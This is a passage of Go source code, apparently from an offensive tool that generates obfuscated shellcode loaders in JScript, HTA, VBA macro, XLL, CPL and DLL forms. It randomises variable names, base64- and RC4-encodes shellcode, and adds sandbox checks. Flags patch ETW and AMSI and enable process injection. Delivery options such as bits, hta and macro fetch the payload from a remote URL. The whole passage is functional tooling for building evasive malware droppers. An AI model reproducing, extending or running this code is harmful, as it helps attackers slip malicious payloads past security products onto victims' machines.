Cryptor.VarNumberLength(10, 19) 1015 | JScript.Variables["htest"] = Cryptor.VarNumberLength(10, 19) 1016 | JScript.Variables["atest"] = Cryptor.VarNumberLength(10, 19) 1017 | JScript.Variables["TextStream11"] = Cryptor.VarNumberLength(10, 19) 1018 | JScript.Variables["res1"] = Cryptor.VarNumberLength(10, 19) 1019 | JScript.Variables["filename1"] = Cryptor.VarNumberLength(10, 19) 1020 | JScript.Variables["characters"] = Cryptor.VarNumberLength(10, 19) 1021 | JScript.Variables["base6411decoded"] = Cryptor.VarNumberLength(10, 19) 1022 | JScript.Variables["BinaryStream"] = Cryptor.VarNumberLength(10, 19) 1023 | JScript.Variables["binaryWriter"] = Cryptor.VarNumberLength(10, 19) 1024 | JScript.Variables["dllname"] = "" 1025 | JScript.Variables["dllvar"] = Cryptor.VarNumberLength(10, 19) 1026 | JScript.Variables["dll"] = Utils.B64ripper(encoded, JScript.Variables["dllvar"], false) 1027 | JScript.Variables["Loader"] = code 1028 | JScript.Variables["Magic1"] = Cryptor.VarNumberLength(10, 19) 1029 | 1030 | JScript.Variables["rc4"] = Cryptor.VarNumberLength(4, 9) 1031 | JScript.Variables["decodeBase64"] = Cryptor.VarNumberLength(4, 9) 1032 | JScript.Variables["b4decoded"] = Cryptor.VarNumberLength(4, 9) 1033 | JScript.Variables["b4decodedkey"] = Cryptor.VarNumberLength(4, 9) 1034 | JScript.Variables["rc4key"] = Cryptor.VarNumberLength(4, 9) 1035 | JScript.Variables["rc4str"] = Cryptor.VarNumberLength(4, 9) 1036 | JScript.Variables["shellcode"] = Cryptor.VarNumberLength(4, 9) 1037 | 1038 | if mode == "excel" { 1039 | JScript.Variables["dllext"] = ".xll" 1040 | JScript.Variables["FileName"] = name 1041 | } 1042 | if mode == "control" { 1043 | JScript.Variables["dllext"] = ".cpl" 1044 | JScript.Variables["FileName"] = name 1045 | } 1046 | if mode == "wscript" { 1047 | JScript.Variables["dllext"] = wsextension 1048 | JScript.Variables["FileName"] = name 1049 | } 1050 | if mode == "msiexec" { 1051 | JScript.Variables["dllext"] = ".dll" 1052 | JScript.Variables["FileName"] = name 1053 | } 1054 | buffer.Reset() 1055 | JSTemplate, err := template.New("JScript").Parse(Struct.JSfile()) 1056 | if err != nil { 1057 | log.Fatal(err) 1058 | } 1059 | buffer.Reset() 1060 | if err = JSTemplate.Execute(&buffer, JScript); err != nil { 1061 | log.Fatal(err) 1062 | } 1063 | 1064 | if sandbox == true { 1065 | SandboxJScript.Variables["objShell"] = Cryptor.VarNumberLength(10, 19) 1066 | SandboxJScript.Variables["domain"] = Cryptor.VarNumberLength(10, 19) 1067 | SandboxJScript.Variables["loader"] = buffer.String() 1068 | buffer.Reset() 1069 | SandboxJSTemplate, err := template.New("SandboxJScript").Parse(Struct.WScript_Sandbox()) 1070 | if err != nil { 1071 | log.Fatal(err) 1072 | } 1073 | if err = SandboxJSTemplate.Execute(&buffer, SandboxJScript); err != nil { 1074 | log.Fatal(err) 1075 | } 1076 | } else { 1077 | 1078 | } 1079 | return buffer.String() 1080 | } 1081 | 1082 | func HTA_Buff(hexcode string, filename string, HTAtemplate string) string { 1083 | var buffer bytes.Buffer 1084 | var HTATemplate_Struct string 1085 | HTALoader := &HTALoader{} 1086 | HTALoader.Variables = make(map[string]string) 1087 | HTALoader.Variables["payload"] = hexcode 1088 | HTALoader.Variables["RNZyt"] = Cryptor.VarNumberLength(4, 9) 1089 | HTALoader.Variables["bogusWindows1252Chars"] = Cryptor.VarNumberLength(4, 9) 1090 | HTALoader.Variables["correctLatin1Chars"] = Cryptor.VarNumberLength(4, 9) 1091 | HTALoader.Variables["fos"] = Cryptor.VarNumberLength(4, 9) 1092 | HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9) 1093 | HTALoader.Variables["pathworks"] = Cryptor.VarNumberLength(4, 9) 1094 | HTALoader.Variables["dest"] = Cryptor.VarNumberLength(4, 9) 1095 | HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9) 1096 | HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 1097 | HTALoader.Variables["chunkSize"] = Cryptor.VarNumberLength(4, 9) 1098 | HTALoader.Variables["source"] = Cryptor.VarNumberLength(4, 9) 1099 | HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9) 1100 | HTALoader.Variables["decode"] = Cryptor.VarNumberLength(4, 9) 1101 | HTALoader.Variables["hexString"] = Cryptor.VarNumberLength(4, 9) 1102 | HTALoader.Variables["fromByte"] = Cryptor.VarNumberLength(4, 9) 1103 | HTALoader.Variables["decodedFile"] = Cryptor.VarNumberLength(4, 9) 1104 | HTALoader.Variables["sleep"] = Cryptor.VarNumberLength(4, 9) 1105 | HTALoader.Variables["obshell"] = Cryptor.VarNumberLength(4, 9) 1106 | HTALoader.Variables["test1"] = Cryptor.VarNumberLength(4, 9) 1107 | 1108 | if HTAtemplate == "HTA_WScript" { 1109 | HTALoader.Variables["filename"] = filename + ".js" 1110 | HTATemplate_Struct = Struct.HTA_WScript() 1111 | } else { 1112 | HTALoader.Variables["filename"] = filename 1113 | HTATemplate_Struct = Struct.HTA() 1114 | } 1115 | 1116 | buffer.Reset() 1117 | HTATemplate, err := template.New("HTALoader").Parse(HTATemplate_Struct) 1118 | if err != nil { 1119 | log.Fatal(err) 1120 | } 1121 | buffer.Reset() 1122 | if err = HTATemplate.Execute(&buffer, HTALoader); err != nil { 1123 | log.Fatal(err) 1124 | } 1125 | return buffer.String() 1126 | } 1127 | 1128 | func Macro_Buff(URL string, outFile string) { 1129 | var buffer bytes.Buffer 1130 | macro := &Macro{} 1131 | macro.Variables = make(map[string]string) 1132 | macro.Variables["HTTPReq"] = Cryptor.VarNumberLength(4, 9) 1133 | macro.Variables["t"] = Cryptor.VarNumberLength(4, 9) 1134 | macro.Variables["remoteFile"] = Cryptor.VarNumberLength(4, 9) 1135 | macro.Variables["pathOfFile"] = Cryptor.VarNumberLength(4, 9) 1136 | macro.Variables["obj"] = Cryptor.VarNumberLength(4, 9) 1137 | macro.Variables["Full"] = Cryptor.VarNumberLength(4, 9) 1138 | macro.Variables["output"] = Cryptor.VarNumberLength(4, 9) 1139 | macro.Variables["storeIn"] = Cryptor.VarNumberLength(4, 9) 1140 | macro.Variables["sleep"] = Cryptor.VarNumberLength(4, 9) 1141 | macro.Variables["outFile"] = outFile 1142 | macro.Variables["URL"] = URL 1143 | 1144 | buffer.Reset() 1145 | macroTemplate, err := template.New("macro").Parse(Struct.Macro()) 1146 | if err != nil { 1147 | log.Fatal(err) 1148 | } 1149 | buffer.Reset() 1150 | if err := macroTemplate.Execute(&buffer, macro); err != nil { 1151 | log.Fatal(err) 1152 | } 1153 | fmt.Println(buffer.String()) 1154 | } 1155 | 1156 | func CompileFile(b64ciphertext string, b64key string, b64iv string, mode string, outFile string, console bool, sandbox bool, ETW bool, ProcessInjection string, sleep bool, AMSI bool, export string, encryptionmode string, exectype string, evasion string) (string, string) { 1157 | var code, FuncName, NTFuncName string 1158 | name, filename := FileName(mode) 1159 | if ETW == false { 1160 | fmt.Println("[+] Patched ETW Enabled") 1161 | } 1162 | if AMSI == false { 1163 | fmt.Println("[+] Patched AMSI Enabled") 1164 | } 1165 | if ProcessInjection != "" { 1166 | fmt.Println("[+] Process Injection Mode Enabled") 1167 | fmt.Println("[*] Created Process: " + ProcessInjection) 1168 | } 1169 | Exec_Type := exectype 1170 | code, FuncName, NTFuncName = Binaryfile(b64ciphertext, b64key, b64iv, mode, console, sandbox, name, ETW, ProcessInjection, sleep, AMSI, export, Exec_Type, evasion) 1171 | os.MkdirAll(name, os.ModePerm) 1172 | Utils.Writefile(name+"/"+name+".go", code) 1173 | Utils.B64decode("loader.zip") 1174 | Utils.Unzip("loader.zip", name) 1175 | os.RemoveAll("loader.zip") 1176 | if mode == "binary" { 1177 | Utils.B64decode("icons.zip") 1178 | Utils.Unzip("icons.zip", name) 1179 | os.RemoveAll("icons.zip") 1180 | } 1181 | if mode == "control" { 1182 | Utils.B64decode("control.zip") 1183 | Utils.Unzip("control.zip", name) 1184 | os.RemoveAll("control.zip") 1185 | } 1186 | if mode == "wscript" { 1187 | Utils.B64decode("wscript.zip") 1188 | Utils.Unzip("wscript.zip", name) 1189 | os.RemoveAll("wscript.zip") 1190 | } 1191 | if mode == "excel" { 1192 | Utils.B64decode("excel.zip") 1193 | Utils.Unzip("excel.zip", name) 1194 | os.RemoveAll("excel.zip") 1195 | } 1196 | if mode == "dll" || mode == "msiexec" { 1197 | Utils.B64decode("dll.zip") 1198 | Utils.Unzip("dll.zip", name) 1199 | os.RemoveAll("dll.zip") 1200 | } 1201 | 1202 | os.Chdir(name) 1203 | Shellcode_Buff(b64ciphertext, b64key, b64iv, FuncName, NTFuncName, encryptionmode) 1204 | Utils.ModuleObfuscator(name, FuncName, encryptionmode) 1205 | return name, filename 1206 | } 1207 | func CompileLoader(mode string, outFile string, filename string, name string, CommandLoader string, URL string, sandbox bool, path string) { 1208 | if mode == "binary" { 1209 | Utils.GoEditor(name + ".exe") 1210 | } else { 1211 | Utils.GoEditor(name + ".dll") 1212 | } 1213 | if mode == "excel" { 1214 | os.Rename(name+".dll", name+".xll") 1215 | Utils.Sha256(name + ".xll") 1216 | } else if mode == "control" { 1217 | os.Rename(name+".dll", name+".cpl") 1218 | if outFile == "" { 1219 | os.Chdir("..") 1220 | os.Rename(name+"/"+name+".cpl", name+".cpl") 1221 | os.RemoveAll(name) 1222 | fmt.Println("[+] " + name + ".cpl File Ready") 1223 | Utils.Sha256(name + ".cpl") 1224 | if CommandLoader == "control" { 1225 | outFile = name + ".cpl" 1226 | Utils.Command(URL, CommandLoader, outFile) 1227 | } 1228 | if path != "" { 1229 | Utils.FileMover(name, path) 1230 | } 1231 | return 1232 | } 1233 | } else if mode == "wscript" { 1234 | os.Rename(outFile+".dll", name+".dll") 1235 | Utils.Sha256(name + ".dll") 1236 | } else if mode == "msiexec" { 1237 | os.Rename(outFile+".dll", name+".dll") 1238 | Utils.Sha256(name + ".dll") 1239 | } else if mode == "binary" { 1240 | os.Chdir("..") 1241 | os.Rename(name+"/"+name+".exe", name+".exe") 1242 | os.RemoveAll(name) 1243 | fmt.Println("[+] Binary Compiled") 1244 | Utils.Sha256(name + ".exe") 1245 | if CommandLoader == "bits" { 1246 | outFile = name + ".exe" 1247 | Utils.Command(URL, CommandLoader, outFile) 1248 | } 1249 | if path != "" { 1250 | Utils.FileMover(name, path) 1251 | } 1252 | return 1253 | } else if mode == "dll" { 1254 | os.Chdir("..") 1255 | os.Rename(name+"/"+name+".dll", name+".dll") 1256 | os.RemoveAll(name) 1257 | Utils.Sha256(name + ".dll") 1258 | fmt.Println("[+] DLL Compiled") 1259 | fmt.Println("[!] Note: Loading a dll (with Rundll32 or Regsvr32) that has the same name as a valid system DLL will cause problems, in this case its best to change the name slightly") 1260 | if path != "" { 1261 | Utils.FileMover(name, path) 1262 | } 1263 | return 1264 | } 1265 | fmt.Println("[*] Creating Loader") 1266 | code, fso, dropPath, wsextension := JScriptLoader_Buff(name, filename, mode, sandbox, CommandLoader) 1267 | f, _ := os.Open(filename) 1268 | reader := bufio.NewReader(f) 1269 | content, _ := ioutil.ReadAll(reader) 1270 | encoded := base64.StdEncoding.EncodeToString(content) 1271 | finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox, wsextension) 1272 | 1273 | URL = Utils.Command(URL, CommandLoader, outFile) 1274 | if CommandLoader == "hta" { 1275 | var HTAtemplate string 1276 | if mode == "wscript" { 1277 | HTAtemplate = "HTA_WScript" 1278 | finalcode = HTA_Buff(hex.EncodeToString([]byte(finalcode)), filename, HTAtemplate) 1279 | fmt.Println("[!] Note an additional file: " + filename + ".js will be dropped in the user's TEMP folder") 1280 | } else { 1281 | HTAtemplate = "HTA" 1282 | finalcode = HTA_Buff(finalcode, filename, HTAtemplate) 1283 | } 1284 | } 1285 | if CommandLoader == "macro" { 1286 | Macro_Buff(URL, outFile) 1287 | } 1288 | Utils.Writefile(outFile, finalcode) 1289 | os.Chdir("..") 1290 | os.Rename(name+"/"+outFile, outFile) 1291 | os.RemoveAll(name) 1292 | Utils.Sha256(outFile) 1293 | if path != "" { 1294 | Utils.FileMover(outFile, path) 1295 | } 1296 | fmt.Println("[+] Loader Compiled") 1297 | if path != "" { 1298 | Utils.FileMover(name, path) 1299 | } 1300 | } 1301 | --------------------------------------------------------------------------------